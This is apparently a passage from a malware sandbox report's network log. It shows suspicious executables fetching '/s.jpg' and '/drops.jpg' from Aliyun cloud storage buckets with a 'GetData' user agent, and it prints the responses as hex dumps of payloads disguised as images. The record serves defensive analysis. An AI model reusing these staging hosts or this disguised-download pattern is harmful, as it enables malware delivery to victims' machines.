1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 Data Ascii: _##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-11 03:44:00 UTC	4096	IN	Data Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-01-11 03:44:00 UTC	4096	IN	Data Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 Data Ascii: 0JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKSA
2025-01-11 03:44:01 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-11 03:44:01 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-11 03:44:01 UTC	4096	IN	Data Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 Data Ascii: G<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-11 03:44:01 UTC	160	IN	Data Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 00 c5 c7 29 Data Ascii: VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49980	39.103.20.105	443	7616	C:\Users\user\Desktop\2976587-987347589.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:44:03 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: 662hfg.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:44:03 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:44:03 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 6781E9035DFDD1373055CCAB Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 3
2025-01-11 03:44:03 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-11 03:44:03 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-11 03:44:03 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49981	118.178.60.9	443	4456	C:\Users\user\Documents\XY3LL0.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:44:18 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:44:18 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:44:18 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 6781E912FDF0783130574233 Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 9
2025-01-11 03:44:18 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-11 03:44:18 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-11 03:44:18 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49982	118.178.60.9	443	4456	C:\Users\user\Documents\XY3LL0.exe

Timestamp	Bytes transferred	Direction	Data
